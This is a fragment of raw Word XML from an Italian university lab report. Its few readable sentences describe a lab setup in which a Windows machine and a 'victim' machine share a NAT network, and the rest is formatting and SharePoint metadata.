        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Ho utilizzato la macchina Windows fornita a lezione e ho scaricato il pac</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hetto Office con l’account accademico.</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> La vittima non ha un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statico;</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e due machine sono connesse ad una rete</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> il cui indirizzo è 192.168.43.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FBD26" w14:textId="77777777" w:rsidR="0081456B" w:rsidRPr="00D1660C" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0081456B" w:rsidRPr="00D16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1C6"/>
    <w:rsid w:val="00196577"/>
    <w:rsid w:val="001C0B72"/>
    <w:rsid w:val="002214D0"/>
    <w:rsid w:val="00267F5A"/>
    <w:rsid w:val="003104B9"/>
    <w:rsid w:val="003833E3"/>
    <w:rsid w:val="00387493"/>
    <w:rsid w:val="003D71C6"/>
    <w:rsid w:val="004A1568"/>
    <w:rsid w:val="004E5B38"/>
    <w:rsid w:val="007E6D03"/>
    <w:rsid w:val="0080432E"/>
    <w:rsid w:val="0081456B"/>
    <w:rsid w:val="00A536A2"/>
    <w:rsid w:val="00AE059A"/>
    <w:rsid w:val="00B046EC"/>
    <w:rsid w:val="00B160DA"/>
    <w:rsid w:val="00B31DDC"/>
    <w:rsid w:val="00B355D4"/>
    <w:rsid w:val="00B40B24"/>
    <w:rsid w:val="00BA0797"/>
    <w:rsid w:val="00CF6E38"/>
    <w:rsid w:val="00D1660C"/>
    <w:rsid w:val="00D5452C"/>
    <w:rsid w:val="00D72A89"/>
    <w:rsid w:val="00DD1CDD"/>
    <w:rsid w:val="00DE7216"/>
    <w:rsid w:val="00E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976B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{73C8B3BE-5C38-468F-9C6D-95D333F5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71C6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C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71C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71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71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71C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71C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D71C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D71C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D71C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71C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71C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71C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D71C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71C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D71C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D71C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D71C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D71C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D71C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D71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3D71C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71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71C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3D71C6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003D71C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D71C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D71C6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D71C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D71C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3D71C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D71C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D71C6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3D71C6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3D71C6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D71C6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4A156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1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xb11a1/yetAnotherObfuscator.g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df6df5-3fad-46ca-9360-c9ec0c0b03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AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
    <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
    <xsd:import namespace="f1c65361-0737-4e30-bb3a-9e2ed6fea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f6df5-3fad-46ca-9360-c9ec0c0b0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65361-0737-4e30-bb3a-9e2ed6fea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D7A4B1-5AA0-4687-ADA6-A38D425A5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BB391-AD20-4994-9E9B-D3F6C61061F0}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD57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C8422-D422-4F67-B8D4-238A7F717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f6df5-3fad-46ca-9360-c9ec0c0b036b"/>
    <ds:schemaRef ds:uri="f1c65361-0737-4e30-bb3a-9e2ed6fea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a Francesca Paci</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>CHRISTIAN FARINA</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T13:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01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83bd9d-ad50-4f0b-b8f1-da2489c79626</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x01010003AD22B01210FE489D9BE433888FACA9</vt:lpwstr>
  </property>
</Properties>
</file>